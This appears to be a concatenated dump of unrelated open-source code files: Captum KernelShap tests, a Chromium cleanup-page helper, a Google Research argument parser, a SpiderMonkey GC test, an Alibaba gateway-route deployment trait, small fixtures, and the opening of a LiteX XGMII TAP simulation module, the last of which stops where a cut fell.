        self._single_input_scalar_kernel_shap_assert(
            lambda inp: torch.sum(net(inp)).item()
        )

    def test_single_kernel_shap_scalar_tensor_0d(self) -> None:
        net = BasicModel_MultiLayer()
        self._single_input_scalar_kernel_shap_assert(lambda inp: torch.sum(net(inp)))

    def test_single_kernel_shap_scalar_tensor_1d(self) -> None:
        net = BasicModel_MultiLayer()
        self._single_input_scalar_kernel_shap_assert(
            lambda inp: torch.sum(net(inp)).reshape(1)
        )

    def test_single_kernel_shap_scalar_int(self) -> None:
        net = BasicModel_MultiLayer()
        self._single_input_scalar_kernel_shap_assert(
            lambda inp: int(torch.sum(net(inp)).item())
        )

    # Shared single-input scenario for the scalar-output variants above;
    # target=None since the forward output has no class dimension.
    def _single_input_scalar_kernel_shap_assert(self, func: Callable) -> None:
        inp = torch.tensor([[2.0, 10.0, 3.0]], requires_grad=True)
        mask = torch.tensor([[0, 0, 1]])

        self._kernel_shap_test_assert(
            func,
            inp,
            [[79.0, 79.0, 21.0]],
            feature_mask=mask,
            perturbations_per_eval=(1,),
            target=None,
        )

    def test_multi_inp_kernel_shap_scalar_tensor_0d(self) -> None:
        net = BasicModel_MultiLayer_MultiInput()
        self._multi_input_scalar_kernel_shap_assert(lambda *inp: torch.sum(net(*inp)))

    def test_multi_inp_kernel_shap_scalar_tensor_1d(self) -> None:
        net = BasicModel_MultiLayer_MultiInput()
        self._multi_input_scalar_kernel_shap_assert(
            lambda *inp: torch.sum(net(*inp)).reshape(1)
        )

    def test_multi_inp_kernel_shap_scalar_tensor_int(self) -> None:
        net = BasicModel_MultiLayer_MultiInput()
        self._multi_input_scalar_kernel_shap_assert(
            lambda *inp: int(torch.sum(net(*inp)).item())
        )

    def test_multi_inp_kernel_shap_scalar_float(self) -> None:
        net = BasicModel_MultiLayer_MultiInput()
        self._multi_input_scalar_kernel_shap_assert(
            lambda *inp: torch.sum(net(*inp)).item()
        )

    # Shared multi-input scenario for the scalar-output variants above.
    def _multi_input_scalar_kernel_shap_assert(self, func: Callable) -> None:
        inp1 = torch.tensor([[23.0, 100.0, 0.0], [20.0, 50.0, 30.0]])
        inp2 = torch.tensor([[20.0, 50.0, 30.0], [0.0, 100.0, 0.0]])
        inp3 = torch.tensor([[0.0, 100.0, 10.0], [20.0, 10.0, 13.0]])
        mask1 = torch.tensor([[1, 1, 1]])
        mask2 = torch.tensor([[0, 1, 2]])
        mask3 = torch.tensor([[0, 1, 2]])
        expected = (
            [[3850.6666, 3850.6666, 3850.6666]],
            [[306.6666, 3850.6666, 410.6666]],
            [[306.6666, 3850.6666, 410.6666]],
        )

        self._kernel_shap_test_assert(
            func,
            (inp1, inp2, inp3),
            expected,
            additional_input=(1,),
            feature_mask=(mask1, mask2, mask3),
            perturbations_per_eval=(1,),
            target=None,
            n_samples=1500,
        )
    # Core assertion helper: runs KernelShap for every requested batch size
    # and compares the attributions (and optionally the raw coefficients
    # obtained with return_input_shape=False) to the expected values,
    # allowing a max-elementwise deviation of `delta`.
    def _kernel_shap_test_assert(
        self,
        model: Callable,
        test_input: TensorOrTupleOfTensorsGeneric,
        expected_attr,
        feature_mask: Union[None, TensorOrTupleOfTensorsGeneric] = None,
        additional_input: Any = None,
        perturbations_per_eval: Tuple[int, ...] = (1,),
        baselines: BaselineType = None,
        target: Union[None, int] = 0,
        n_samples: int = 100,
        delta: float = 1.0,
        expected_coefs: Union[None, List[float], List[List[float]]] = None,
        show_progress: bool = False,
    ) -> None:
        for batch_size in perturbations_per_eval:
            kernel_shap = KernelShap(model)
            attributions = kernel_shap.attribute(
                test_input,
                target=target,
                feature_mask=feature_mask,
                additional_forward_args=additional_input,
                baselines=baselines,
                perturbations_per_eval=batch_size,
                n_samples=n_samples,
                show_progress=show_progress,
            )
            assertTensorTuplesAlmostEqual(
                self, attributions, expected_attr, delta=delta, mode="max"
            )
            if expected_coefs is not None:
                # Test with return_input_shape = False
                attributions = kernel_shap.attribute(
                    test_input,
                    target=target,
                    feature_mask=feature_mask,
                    additional_forward_args=additional_input,
                    baselines=baselines,
                    perturbations_per_eval=batch_size,
                    n_samples=n_samples,
                    return_input_shape=False,
                    show_progress=show_progress,
                )
                assertTensorAlmostEqual(
                    self, attributions, expected_coefs, delta=delta, mode="max"
                )
if __name__ == "__main__":
unittest.main()
| 7,437 |
575 | // Copyright 2017 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "chrome/browser/safe_browsing/chrome_cleaner/chrome_cleaner_navigation_util_win.h"
#include "chrome/browser/safe_browsing/chrome_cleaner/srt_field_trial_win.h"
#include "chrome/browser/ui/browser_list.h"
#include "chrome/browser/ui/browser_window.h"
#include "chrome/browser/ui/chrome_pages.h"
#include "chrome/browser/ui/tabs/tab_strip_model.h"
#include "chrome/common/url_constants.h"
#include "ui/base/page_transition_types.h"
#include "ui/base/window_open_disposition.h"
#include "url/gurl.h"
namespace chrome_cleaner_util {
namespace {
// Returns the chrome://settings URL of the Chrome Cleanup subpage.
GURL GetCleanupPageURL() {
  return chrome::GetSettingsUrl(chrome::kCleanupSubPage);
}
}  // namespace
// Returns the most recently active tabbed (normal) browser whose window is
// focused or at least not minimized, or nullptr if no such browser exists.
Browser* FindBrowser() {
  BrowserList* browsers = BrowserList::GetInstance();
  for (auto it = browsers->begin_last_active(); it != browsers->end_last_active();
       ++it) {
    Browser* candidate = *it;
    if (!candidate->is_type_normal())
      continue;
    if (candidate->window()->IsActive() || !candidate->window()->IsMinimized())
      return candidate;
  }
  return nullptr;
}
// True when |browser|'s currently selected tab has the Cleanup settings page
// as its last committed URL.
bool CleanupPageIsActiveTab(Browser* browser) {
  DCHECK(browser);
  content::WebContents* active_contents =
      browser->tab_strip_model()->GetActiveWebContents();
  if (!active_contents)
    return false;
  return active_contents->GetLastCommittedURL() == GetCleanupPageURL();
}
// Navigates |browser| to the Cleanup settings page using |disposition|
// (e.g. current tab vs. new foreground tab).
void OpenCleanupPage(Browser* browser, WindowOpenDisposition disposition) {
  DCHECK(browser);
  content::OpenURLParams params(GetCleanupPageURL(), content::Referrer(),
                                disposition, ui::PAGE_TRANSITION_AUTO_TOPLEVEL,
                                /*is_renderer_initiated=*/false);
  browser->OpenURL(params);
}
} // namespace chrome_cleaner_util
| 663 |
23,901 | <reponame>deepneuralmachine/google-research
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
# pylint: skip-file
import argparse
import os
import pickle as cp
import torch
# Command-line parser for grecur. parse_known_args() below tolerates flags
# owned by other modules, so this file can be imported from larger programs.
cmd_opt = argparse.ArgumentParser(description='Argparser for grecur', allow_abbrev=False)
# --- paths and run mode ---
cmd_opt.add_argument('-save_dir', default='.', help='result output root')
cmd_opt.add_argument('-data_dir', default='.', help='data dir')
cmd_opt.add_argument('-eval_folder', default=None, help='data eval_dir')
cmd_opt.add_argument('-train_method', default='full', help='full/stage')
cmd_opt.add_argument('-phase', default='train', help='train/test')
cmd_opt.add_argument('-g_type', default=None, help='graph type')
cmd_opt.add_argument('-model_dump', default=None, help='load model dump')
# --- hardware / distribution ---
cmd_opt.add_argument('-gpu', type=int, default=-1, help='-1: cpu; 0 - ?: specific gpu index')
cmd_opt.add_argument('-num_proc', type=int, default=1, help='number of processes')
cmd_opt.add_argument('-node_order', default='default', help='default/DFS/BFS/degree_descent/degree_accent/k_core/all, or any of them concat by +')
cmd_opt.add_argument('-dist_backend', default='gloo', help='dist package backend', choices=['gloo', 'nccl'])
# --- model architecture ---
cmd_opt.add_argument('-embed_dim', default=256, type=int, help='embed size')
cmd_opt.add_argument('-bits_compress', default=256, type=int, help='num of bits to compress')
cmd_opt.add_argument('-param_layers', default=1, type=int, help='num of param groups')
cmd_opt.add_argument('-num_test_gen', default=-1, type=int, help='num of graphs generated for test')
cmd_opt.add_argument('-max_num_nodes', default=-1, type=int, help='max num of nodes')
cmd_opt.add_argument('-rnn_layers', default=2, type=int, help='num layers in rnn')
# --- optimization hyper-parameters ---
cmd_opt.add_argument('-seed', default=34, type=int, help='seed')
cmd_opt.add_argument('-learning_rate', default=1e-3, type=float, help='learning rate')
cmd_opt.add_argument('-grad_clip', default=5, type=float, help='gradient clip')
cmd_opt.add_argument('-train_ratio', default=0.8, type=float, help='ratio for training')
cmd_opt.add_argument('-dev_ratio', default=0.2, type=float, help='ratio for dev')
cmd_opt.add_argument('-greedy_frac', default=0, type=float, help='prob for greedy decode')
cmd_opt.add_argument('-num_epochs', default=100000, type=int, help='num epochs')
cmd_opt.add_argument('-batch_size', default=10, type=int, help='batch size')
# --- positional encoding and model variants ---
cmd_opt.add_argument('-pos_enc', default=True, type=eval, help='pos enc?')
cmd_opt.add_argument('-pos_base', default=10000, type=int, help='base of pos enc')
cmd_opt.add_argument('-old_model', default=False, type=eval, help='old model dumps?')
cmd_opt.add_argument('-tree_pos_enc', default=False, type=eval, help='pos enc for tree?')
cmd_opt.add_argument('-blksize', default=-1, type=int, help='num blksize steps')
cmd_opt.add_argument('-accum_grad', default=1, type=int, help='accumulate grad for batching purpose')
# --- checkpointing ---
cmd_opt.add_argument('-epoch_save', default=100, type=int, help='num epochs between save')
cmd_opt.add_argument('-epoch_load', default=None, type=int, help='epoch for loading')
# --- graph/data handling flags (note: type=eval parses the literal text) ---
cmd_opt.add_argument('-batch_exec', default=False, type=eval, help='run with dynamic batching?')
cmd_opt.add_argument('-share_param', default=True, type=eval, help='share param in each level?')
cmd_opt.add_argument('-directed', default=False, type=eval, help='is directed graph?')
cmd_opt.add_argument('-self_loop', default=False, type=eval, help='has self-loop?')
cmd_opt.add_argument('-bfs_permute', default=False, type=eval, help='random permute with bfs?')
cmd_opt.add_argument('-display', default=False, type=eval, help='display progress?')
# Unrecognized arguments are silently ignored.
cmd_args, _ = cmd_opt.parse_known_args()
# Make sure the checkpoint/result directory exists before anything is written.
if cmd_args.save_dir is not None:
    if not os.path.isdir(cmd_args.save_dir):
        os.makedirs(cmd_args.save_dir)
# Resolve -epoch_load into a concrete checkpoint path unless an explicit
# -model_dump was already supplied.
if cmd_args.epoch_load is not None and cmd_args.model_dump is None:
    cmd_args.model_dump = os.path.join(cmd_args.save_dir, 'epoch-%d.ckpt' % cmd_args.epoch_load)
print(cmd_args)
def set_device(gpu):
    """Select the compute device and record it on the global ``cmd_args``.

    A non-negative ``gpu`` index selects that CUDA device when CUDA is
    available; otherwise the CPU is used and ``cmd_args.gpu`` is reset to -1.
    """
    cuda_ok = gpu >= 0 and torch.cuda.is_available()
    if not cuda_ok:
        cmd_args.gpu = -1
        cmd_args.device = torch.device('cpu')
        print('use cpu')
        return
    cmd_args.gpu = gpu
    cmd_args.device = torch.device('cuda:' + str(gpu))
    print('use gpu indexed: %d' % gpu)
| 1,726 |
2,494 | /* -*- Mode: C++; tab-width: 8; indent-tabs-mode: nil; c-basic-offset: 4 -*-
* vim: set ts=8 sts=4 et sw=4 tw=99:
*/
/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
#ifdef JSGC_GENERATIONAL
#include "js/RootingAPI.h"
#include "jsapi-tests/tests.h"
BEGIN_TEST(testGCHeapPostBarriers)
{
    /* Sanity check - objects start in the nursery and then become tenured. */
    JS_GC(cx->runtime());
    JS::RootedObject obj(cx, NurseryObject());
    CHECK(js::gc::IsInsideNursery(obj.get()));
    JS_GC(cx->runtime());
    CHECK(!js::gc::IsInsideNursery(obj.get()));
    /* Root the now-tenured object so it survives the rest of the test. */
    JS::RootedObject tenuredObject(cx, obj);
    /* Currently JSObject and JSFunction objects are nursery allocated. */
    CHECK(TestHeapPostBarriers(NurseryObject()));
    CHECK(TestHeapPostBarriers(NurseryFunction()));
    return true;
}
/*
 * Identity function that is deliberately never inlined; do not "simplify"
 * away — the out-of-line call is the whole point of the workaround below.
 */
MOZ_NEVER_INLINE bool
Passthrough(bool value)
{
    /* Work around a Win64 optimization bug in VS2010. (Bug 1033146) */
    return value;
}
/*
 * Verifies that a JS::Heap<T> wrapper's post-barrier keeps it pointing at a
 * nursery-allocated object after a minor GC moves that object into the
 * tenured heap. CHECK() returns false from this function on failure.
 */
template <typename T>
bool
TestHeapPostBarriers(T initialObj)
{
    CHECK(initialObj != nullptr);
    CHECK(js::gc::IsInsideNursery(initialObj));
    /* Construct Heap<> wrapper. */
    JS::Heap<T> *heapData = new JS::Heap<T>();
    CHECK(heapData);
    CHECK(Passthrough(heapData->get() == nullptr));
    heapData->set(initialObj);
    /* Store the pointer as an integer so that the hazard analysis will miss it. */
    uintptr_t initialObjAsInt = uintptr_t(initialObj);
    /* Perform minor GC and check heap wrapper is updated with new pointer. */
    cx->minorGC(JS::gcreason::API);
    CHECK(uintptr_t(heapData->get()) != initialObjAsInt);
    CHECK(!js::gc::IsInsideNursery(heapData->get()));
    /* Check object is definitely still alive. */
    JS::Rooted<T> obj(cx, heapData->get());
    JS::RootedValue value(cx);
    CHECK(JS_GetProperty(cx, obj, "x", &value));
    CHECK(value.isInt32());
    CHECK(value.toInt32() == 42);
    delete heapData;
    return true;
}
/*
 * Allocates a fresh plain object (expected to start life in the nursery) and
 * tags it with an "x" = 42 property so later liveness checks can verify it.
 * Returns nullptr on allocation failure.
 */
JSObject *NurseryObject()
{
    JS::RootedObject fresh(cx, JS_NewObject(cx, nullptr, JS::NullPtr(), JS::NullPtr()));
    if (fresh)
        JS_DefineProperty(cx, fresh, "x", 42, 0);
    return fresh;
}
JSFunction *NurseryFunction()
{
    /*
     * We don't actually use the function as a function, so here we cheat and
     * cast a JSObject.
     */
    return static_cast<JSFunction *>(NurseryObject());
}
END_TEST(testGCHeapPostBarriers)
#endif
| 1,001 |
407 | <gh_stars>100-1000
package com.alibaba.tesla.appmanager.trait.plugin;
import com.alibaba.fastjson.JSONObject;
import com.alibaba.tesla.appmanager.common.exception.AppErrorCode;
import com.alibaba.tesla.appmanager.common.exception.AppException;
import com.alibaba.tesla.appmanager.domain.core.WorkloadResource;
import com.alibaba.tesla.appmanager.domain.schema.TraitDefinition;
import com.alibaba.tesla.appmanager.trait.BaseTrait;
import com.alibaba.tesla.appmanager.trait.plugin.util.JsonUtil;
import com.alibaba.tesla.appmanager.trait.plugin.util.RequestsUtil;
import lombok.extern.slf4j.Slf4j;
import org.apache.commons.lang3.StringUtils;
import org.apache.commons.lang3.exception.ExceptionUtils;
import com.alibaba.tesla.appmanager.common.util.StringUtil;
import java.text.SimpleDateFormat;
import java.util.Date;
import java.util.concurrent.TimeUnit;
@Slf4j
public class GatewayTrait extends BaseTrait {
public GatewayTrait(String name, TraitDefinition traitDefinition, JSONObject spec, WorkloadResource ref) {
super(name, traitDefinition, spec, ref);
}
// traits:
// - name: gateway.trait.abm.io
// runtime: post
// spec:
// path: "/sreworks-job/**",
// servicePort: 81,
// serviceName: prod-job-job-master
@Override
public void execute() {
/*
1. get metadata from workload
*/
log.info("start execute gateway trait {}", getSpec().toJSONString());
WorkloadResource workloadResource = getWorkloadRef();
String name = workloadResource.getMetadata().getName();
String path = getSpec().getString("path");
String stageId = getComponent().getStageId();
String namespaceId = getComponent().getNamespaceId();
String clusterId = getComponent().getClusterId();
String gatewayEndpoint = getSpec().getString("gatewayEndpoint");
Integer order = 2500;
if (StringUtils.isEmpty(gatewayEndpoint)){
gatewayEndpoint = "http://prod-flycore-paas-gateway";
}
if (StringUtils.isEmpty(stageId)){
stageId = "dev";
}
if (StringUtils.isEmpty(namespaceId)){
namespaceId = "sreworks";
}
String serviceName = getSpec().getString("serviceName");
if (StringUtils.isEmpty(serviceName)){
serviceName = name;
}
int servicePort = getSpec().getIntValue("servicePort");
if (servicePort == 0) {
servicePort = 80;
}
String routeId = String.format("%s-%s-%s-%s", name, clusterId, namespaceId, stageId);
if (!StringUtils.isEmpty(getSpec().getString("routeId"))) {
routeId = getSpec().getString("routeId");
}
if (getSpec().getInteger("order") != null){
order = getSpec().getInteger("order");
}
boolean authEnabled = true;
if (getSpec().getBoolean("authEnabled") != null ){
authEnabled = getSpec().getBoolean("authEnabled");
}
/*
2. apply route config to gateway
*/
try {
for (int i = 0; i < 300; i++) {
try {
JSONObject applyResult = applyGatewayRoute(routeId, stageId, gatewayEndpoint, path, serviceName, servicePort, order, authEnabled);
log.info("apply gateway conf {}", applyResult.toJSONString());
}catch (Exception throwable) {
if (i == 299) {
throw throwable;
}
log.info("apply gateway conf failed, wait next try {}", getSpec().toJSONString());
TimeUnit.MILLISECONDS.sleep(5000);
}
break;
}
} catch (Exception e) {
log.error("apply gateway failed {}", ExceptionUtils.getStackTrace(e));
throw new AppException(AppErrorCode.DEPLOY_ERROR, "apply gateway failed");
}
try {
for (int i = 0; i < 3; i++) {
if (checkGatewayRoute(routeId, stageId, gatewayEndpoint, path, serviceName, servicePort, order, authEnabled)) {
break;
}
if (i == 2){
throw new AppException(AppErrorCode.DEPLOY_ERROR, "check apply gateway not pass");
}
TimeUnit.MILLISECONDS.sleep(5000);
}
} catch ( Exception e) {
log.error("check gateway failed {}", ExceptionUtils.getStackTrace(e));
throw new AppException(AppErrorCode.DEPLOY_ERROR, "check apply gateway failed");
}
}
private String getAuthPasswdHash(String username, String password){
// key = "%(user_name)s%(local_time)s%(passwd)s" % {
// 'user_name': user_name,
// 'local_time': time.strftime('%Y%m%d', time.localtime(time.time())),
// 'passwd': <PASSWORD> }
// m = hashlib.md5()
// m.update(key)
// return m.hexdigest()
SimpleDateFormat formatter = new SimpleDateFormat("yyyyMMdd");
String key = String.format("%s%s%s", username, formatter.format(new Date()), password);
// log.info("getAuthPasswdHash origin string {}", key);
return StringUtil.md5sum(key);
}
/**
* 校验gateway路由
*
* @param path 路由路径
* @param serviceName 服务名称
* @param servicePort 服务端口
* @return boolean
* */
private boolean checkGatewayRoute(String routeId, String stageId, String gatewayEndpoint, String path, String serviceName, int servicePort, int order, boolean authEnabled) throws Exception {
String username = System.getenv("ACCOUNT_SUPER_ID");
String password = System.getenv("ACCOUNT_SUPER_SECRET_KEY");
String clientId = System.getenv("ACCOUNT_SUPER_CLIENT_ID");
String clientSecret = System.getenv("ACCOUNT_SUPER_CLIENT_SECRET");
String gatewayRouteApi = String.format("%s/v2/common/gateway/route/%s", gatewayEndpoint, routeId);
String url = String.format("http://%s:%s/", serviceName, servicePort);
JSONObject resp = new RequestsUtil(gatewayRouteApi).headers(
"x-auth-app", clientId,
"x-auth-key", clientSecret,
"x-auth-user", username,
"x-auth-passwd", getAuthPasswdHash(username, password)
).get().isSuccessful()
.getJSONObject();
log.info("gateway check route:{} {}", gatewayRouteApi, resp.toJSONString());
if(resp.getInteger("code") == 200 && resp.getJSONObject("data") != null){
if(!resp.getJSONObject("data").getString("routeId").equals(routeId)){
log.info("gateway check route [routeId] not pass:{} ", resp.getJSONObject("data").toJSONString());
return false;
}
if(!resp.getJSONObject("data").getString("path").equals(path)){
log.info("gateway check route [path] not pass:{} ", resp.getJSONObject("data").toJSONString());
return false;
}
if(!resp.getJSONObject("data").getString("url").equals(url)){
log.info("gateway check route [url] not pass:{} ", resp.getJSONObject("data").toJSONString());
return false;
}
if(resp.getJSONObject("data").getString("stageId") == null){
if(!StringUtils.equals(stageId, "prod")){
log.info("gateway check route [noStageId] not pass:{} ", resp.getJSONObject("data").toJSONString());
}
} else if (!resp.getJSONObject("data").getString("stageId").equals(stageId)){
log.info("gateway check route [stageId] not pass:{} ", resp.getJSONObject("data").toJSONString());
return false;
}
if(resp.getJSONObject("data").getInteger("order") != order){
log.info("gateway check route [order] not pass:{} ", resp.getJSONObject("data").toJSONString());
return false;
}
if(resp.getJSONObject("data").getBoolean("authCheck") != authEnabled){
log.info("gateway check route [authCheck] not pass:{} ", resp.getJSONObject("data").toJSONString());
return false;
}
return true;
}else {
log.info("gateway check route not exist:{} {}", gatewayRouteApi, resp.toJSONString());
return false;
}
}
/**
* 推送gateway路由
*
* @param path 路由路径
* @param serviceName 服务名称
* @param servicePort 服务端口
* @return JSONObject
*/
private JSONObject applyGatewayRoute(String routeId, String stageId, String gatewayEndpoint, String path, String serviceName, int servicePort, int order, boolean authEnabled) throws Exception {
String username = System.getenv("ACCOUNT_SUPER_ID");
String password = System.getenv("ACCOUNT_SUPER_SECRET_KEY");
String clientId = System.getenv("ACCOUNT_SUPER_CLIENT_ID");
String clientSecret = System.getenv("ACCOUNT_SUPER_CLIENT_SECRET");
String gatewayRouteApi = String.format("%s/v2/common/gateway/route/%s", gatewayEndpoint, routeId);
String gatewayInsertApi = String.format("%s/v2/common/gateway/route", gatewayEndpoint);
String mode = "insert";
JSONObject resp = new RequestsUtil(gatewayRouteApi).headers(
"x-auth-app", clientId,
"x-auth-key", clientSecret,
"x-auth-user", username,
"x-auth-passwd", getAuthPasswdHash(username, password)
).get().isSuccessful()
.getJSONObject();
log.info("gateway check route:{} {}", gatewayRouteApi, resp.toJSONString());
if(resp.getInteger("code") == 200 && resp.getJSONObject("data") != null){
mode = "update";
}
JSONObject routeJson = JsonUtil.map(
"appId", routeId,
"authCheck", authEnabled,
"authHeader", authEnabled,
"authLogin", authEnabled,
"enable", true,
"enableFunction", false,
"enableSwaggerDoc", false,
"name", "health",
"path", path,
"routeId", routeId,
"routeType", "PATH",
"serverType", "PAAS",
// "stageId", stageId,
"order", order,
"url", String.format("http://%s:%s/", serviceName, servicePort)
);
// 当前stageId=prod时候,不增加stageId,作为默认路由
if (!StringUtils.equals(stageId, "prod")){
routeJson.put("stageId", stageId);
}
String authPasswd = getAuthPasswdHash(username, password);
log.info("gateway routeJson: {}", routeJson.toJSONString());
if (mode.equals("insert")){
return new RequestsUtil(gatewayInsertApi)
.postJson(routeJson)
.headers(
"x-auth-app", clientId,
"x-auth-key", clientSecret,
"x-auth-user", username,
"x-auth-passwd", <PASSWORD>
)
.post().isSuccessful()
.getJSONObject();
}else {
return new RequestsUtil(gatewayRouteApi)
.headers(
"x-auth-app", clientId,
"x-auth-key", clientSecret,
"x-auth-user", username,
"x-auth-passwd", <PASSWORD>
)
.postJson(routeJson)
.put().isSuccessful()
.getJSONObject();
}
}
}
| 5,586 |
708 | <reponame>sigfox/pkgcloud
{"server":{"name":"test-reboot","image":112,"flavor":1,"flavorId":1,"imageId":112,"personality":[]}} | 47 |
755 | <filename>rxgroups-annotation-test/src/test/resources/AutoTaggableObserver_Pass_All_CustomTag.java<gh_stars>100-1000
package test;
import com.airbnb.rxgroups.AutoResubscribe;
import com.airbnb.rxgroups.AutoTag;
import com.airbnb.rxgroups.AutoTaggableObserverImpl;
// Annotation-processor test fixture: a class where both @AutoResubscribe and
// @AutoTag carry explicit custom tags, expected to process without errors.
public class AutoTaggableObserver_Pass_All_CustomTag {
  @AutoResubscribe(customTag = "tag1")
  public AutoTaggableObserverImpl<Object> resubscribeObserver = new AutoTaggableObserverImpl<Object>();
  @AutoTag(customTag = "tag2")
  public AutoTaggableObserverImpl<Object> autoTag = new AutoTaggableObserverImpl<Object>();
}
| 199 |
1,014 | {
"EYP.F": {
"short_name": "EYDAP S.A. INH EO 0,6",
"long_name": "Athens Water Supply and Sewerage Company S.A.",
"summary": "Athens Water Supply and Sewerage Company S.A., together with its subsidiaries, engages in the water supply and refinement, and sewerage and waste management activities in Greece. The company is involved in the analysis, construction, establishment, operation, exploitation, maintenance, expansion, and modernization/renewal of water supply and sewerage installation and networks. It operates a water distribution network of 14,000 kilometers; four units of water refining with a total daily capacity of 1.8 million cubic water meters; a sewerage network of 9,500 kilometers; and three waste management centers in Psitalia, Metamorphosis, and Thriasio. The company also engages in irrigation and rain water collection activities. In addition, it produces electric energy through hydro, solar, biogas, natural gas, and thermal energy sources. Athens Water Supply and Sewerage Company S.A. was founded in 1980 and is headquartered in Athens, Greece. Athens Water Supply and Sewerage Company S.A. operates as a subsidiary of Hellenic Corporation of Assets & Participations S.A.",
"currency": "EUR",
"sector": "Utilities",
"industry": "Utilities - Regulated Water",
"exchange": "FRA",
"market": "dr_market",
"country": "Greece",
"state": null,
"city": "Athens",
"zipcode": "11146",
"website": "http://www.eydap.gr",
"market_cap": "Small Cap"
}
} | 508 |
1,501 | <reponame>osterwood/litex
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include "error.h"
#include <event2/listener.h>
#include <event2/util.h>
#include <event2/event.h>
#include <json-c/json.h>
#include <zlib.h>
#include "tapcfg.h"
#include "modules.h"
// ---------- SETTINGS ---------- //
// XGMII bus data width. Can be either 32 or 64 bit.
#define XGMII_WIDTH 64
// Ethernet MTU. Must be >= MIN_ETH_LEN.
#define ETH_LEN 9000
// MAC address for the host's TAP interface
static const char macadr[6] = {0xaa, 0xb6, 0x24, 0x69, 0x77, 0x21};
// Debug (print to stderr) invalid bus states
#define XGMII_TX_DEBUG_INVAL_SIGNAL
// Hex-dump transmitted (Sim -> TAP) packets to stderr
//#define XGMII_TX_DEBUG
// Hex-dump received (TAP -> Sim) packets to stderr
//#define XGMII_RX_DEBUG
// ------------------------------ //
#define MIN_ETH_LEN 60
#define XGMII_IDLE_DATA 0x0707070707070707
#define XGMII_IDLE_CTL 0xFF
// Contains the start XGMII control character (fb), the XGMII preamble
// (48-bit alternating 0 and 1) and the Ethernet start of frame delimiter
#define XGMII_FB_PREAMBLE_SF_DATA 0xD5555555555555FB
#define XGMII_FB_PREAMBLE_SF_CTL 0x01
#define XGMII_CTLCHAR_START 0xFB
#define XGMII_CTLCHAR_END 0xFD
#define XGMII_CTLCHAR_IDLE 0x07
// Type definitions for the XGMII bus contents, irrespective of the XGMII bus
// width used. The data here is then latched out over a bus with the
// xgmii_*_signal_t types.
typedef uint64_t xgmii_data_t;
typedef uint8_t xgmii_ctl_t;
// One full 64-bit XGMII bus word: eight data octets plus one control bit per
// octet (ctl bit i set means data byte i is an XGMII control character).
typedef struct xgmii_bus_snapshot {
    xgmii_data_t data;
    xgmii_ctl_t ctl;
} xgmii_bus_snapshot_t;
#if XGMII_WIDTH == 64
typedef uint64_t xgmii_data_signal_t;
typedef uint8_t xgmii_ctl_signal_t;
#define XGMII_DATA_SIGNAL_MASK 0xFFFFFFFFFFFFFFFF
#define XGMII_CTL_SIGNAL_MASK 0xFF
// TODO: remove legacy defines
#define DW_64
#elif XGMII_WIDTH == 32
typedef uint32_t xgmii_data_signal_t;
typedef uint8_t xgmii_ctl_signal_t;
#define XGMII_DATA_SIGNAL_MASK 0xFFFFFFFF
#define XGMII_CTL_SIGNAL_MASK 0x0F
#define XGMII_UPPER_DATA_SHIFT 32
#define XGMII_UPPER_CTL_SHIFT 4
#else
#error "Invalid XGMII data width!"
#endif
// XGMII RX Mealy state machine
//
// State transitions and outputs:
//
// IDLE
// |-> IDLE: data = XGMII_IDLE_DATA
// | ctl = XGMII_IDLE_CTL
// \-> RECEIVE: data = XGMII_FB_PREAMBLE_SF_DATA
// ctl = XGMII_FB_PREAMBLE_SF_CTL
//
// RECEIVE
// |-> RECEIVE: data = 8 * <payload>
// | ctl = 0x00
// \-> IDLE: data = m * XGMII_CTLCHAR_IDLE
// | XGMII_CTLCHAR_PACKET_END
// | n * <payload>
// ctl = 0xFF & ~(2 ** n - 1)
typedef enum xgmii_rx_state {
    XGMII_RX_STATE_IDLE,     // idle words on the bus; a new frame may start
    XGMII_RX_STATE_RECEIVE,  // frame payload (and terminator) being driven
} xgmii_rx_state_t;
// XGMII TX Mealy state machine
typedef enum xgmii_tx_state {
    XGMII_TX_STATE_IDLE,      // waiting for an XGMII start control character
    XGMII_TX_STATE_TRANSMIT,  // collecting payload until the end character
} xgmii_tx_state_t;
// RX incoming (TAP -> Sim) Ethernet packet queue structs
typedef struct eth_packet_queue {
    // Does not contain the trailing CRC32 checksum
    uint8_t data[ETH_LEN];
    size_t len;
    struct eth_packet_queue *next;  // singly-linked FIFO; NULL at the tail
} eth_packet_queue_t;
// Per-instance simulation state tying the XGMII bus signals to a host TAP
// network device.
typedef struct xgmii_state {
    // ---------- SIMULATION & BUS STATE ----------
    // XGMII bus signals
    xgmii_data_signal_t *tx_data_signal;
    xgmii_ctl_signal_t *tx_ctl_signal;
    xgmii_data_signal_t *rx_data_signal;
    xgmii_ctl_signal_t *rx_ctl_signal;
    // RX clock signal and edge state
    uint8_t *rx_clk;
    clk_edge_state_t rx_clk_edge;
    // TX clock signal and edge state
    uint8_t *tx_clk;
    clk_edge_state_t tx_clk_edge;
#if XGMII_WIDTH == 32
    // Internal XGMII DDR transmit (Sim -> TAP) state latched from the bus on
    // the rising clock edge, until it can be processed together with the other
    // half of the data on the falling clock edge. This represents the lower
    // half of the bus' bits.
    xgmii_data_signal_t tx_data_posedge;
    xgmii_ctl_signal_t tx_ctl_posedge;
    // Internal XGMII DDR receive (TAP -> Sim) state latched to the bus on the
    // falling clock edge. This represents the higher half of the bus'
    // bits. This is generated along with the lower half on the rising clock
    // edge.
    xgmii_data_signal_t rx_data_negedge;
    xgmii_ctl_signal_t rx_ctl_negedge;
#endif
    // ---------- GLOBAL STATE --------
    // Handle and file descriptor of the host TAP network device.
    tapcfg_t *tapcfg;
    int tap_fd;
    // ---------- TX (Sim -> TAP) STATE ---------
    xgmii_tx_state_t tx_state;
    // Packet currently being transmitted over the XGMII bus (Sim -> TAP).
    uint8_t current_tx_pkt[ETH_LEN];
    size_t current_tx_len;
